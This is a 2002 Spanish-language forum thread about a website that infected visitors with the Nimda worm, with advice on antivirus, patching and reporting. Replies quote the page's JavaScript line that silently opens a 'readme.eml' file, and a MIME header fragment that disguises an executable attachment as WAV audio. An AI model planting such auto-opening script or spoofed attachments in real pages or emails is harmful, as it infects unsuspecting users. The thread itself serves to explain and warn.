Esta web contien un virus

Gurrutello · #1 (**permalink**) 23/11/2002, 19:08

Hola
Solo visiten este link si tienen un antivirus con soporte para el virus i-worm/ nimda A-H.,
ayer se registro en mi sistema.
es un virus creado en javascript (creo) y estoy intentando detectarlo, pero no se por donde, puesto que de virus se poco.
Alguien sabria como detectarlo
Lo que intento es avisar al crador de la web e intentar ayudarle o bien anular su cuenta si fuera necesario
Por favor quien la visite que tenga un antivirus que erradique el Nimda. El mio lo detecto.

Espero una ayudita

Lo que me interesa es saber si alguien le paso antes, que al visitar una pagina web saltara el antivirus o toyans.
¿Puede ser debido al servidor de la pagina?

se trata de

Cita:

http://www.revistaelmirador.com

He quitado el enlace directo a la pagina porque salta solo al entrar en el dominio

Saludos y cuaidado

Virgil · #2 (**permalink**) 23/11/2002, 20:13

El código NO ESTÁ nada oculto; esta es la línea que lo llama:

Código:

<script language="JavaScript">window.open("readme.eml ", null, 
"resizable=no,top=6000,left=6000")</script>

A estas alturas es increíble, pero la mayoría de la gente no ha deshabilitado esa característica indeseable del oulook y los archivos *.eml con código ejecutable (tipo wav-mid).

Virgil · #3 (**permalink**) 23/11/2002, 20:21

Por cierto, este es el método que utilizaron:

Al abrir el email, con un attachment ejecutable (.exe) que está codificado erroneamente como de tipo audio (wav), el cliente (outlook) lo ejecuta a pesar de no concordar con el tipo, de esta forma:

Código:

blah blah

Content-Type: audio/x-wav ; <----- codificado como audio
name=algun_virus.exe  <----- archivo ejecutable con código malicioso 
Content-Transfer-Encoding: base64

blah blah
;

Gurrutello · #4 (**permalink**) 23/11/2002, 20:36

Lo que quiere decir es que se puede ejecutar cualquier virus desde una pagina web.

Virgil · #5 (**permalink**) 23/11/2002, 22:49

Cita:

Lo que quiere decir es que se puede ejecutar cualquier virus desde una pagina web.

Bajo las condiciones más comunes, si.

Sin embargo, ese es uno de los mecanismos de propagación de código malicioso que en lo particular me tienen menos preocupado.

Mod · #6 (**permalink**) 24/11/2002, 01:40

Gurrutello: son varios los dominios que, en mi navegar, te metían un virus, o un troyano, o cualquier otra lindeza de esa forma. La solución para evitarlo es ser un asiduo del windowsupdate y tener parcheado y actualizado el sistema permanentemente. Además, como vistes, imprescindible un antivirus también actualizado a la última. Además, recomiendo usar un firewall que permita tener control sobre los javascripst, activex, etc... sólo sitios de mi confianza permito que ejecuten estos componentes (como por ejemplo: forosdelweb

). A falta de un firewall de estas características, una buena opción es navegar con netscape 7 o con el Opera. De tener que elegir entre estos dos, te recomiendo el último, o sea, el Opera. Con él puedes tener fácil control sobre si ejecutar o no esos componentes y etc...

Por otra parte, puedes denunciar esa url en el puesto virtual de la guardia civil en la sección de delitos informáticos... pues hacer eso, tal y como dictan las leyes españolas, es, ni más ni menos, que un delito tipificado en el código penal.

Sl2.

chedas · #7 (**permalink**) 24/11/2002, 04:14

Virgil: Cuando te refieres a esto, me gustaría saber que es lo qué tengo que deshabilitar y dónde, me vendría muy bien porque a mí particularmente me llueven correos con virus. :-p

Cita:

A estas alturas es increíble, pero la mayoría de la gente no ha deshabilitado esa característica indeseable del oulook y los archivos *.eml con código ejecutable (tipo wav-mid).

Gracias y un saludo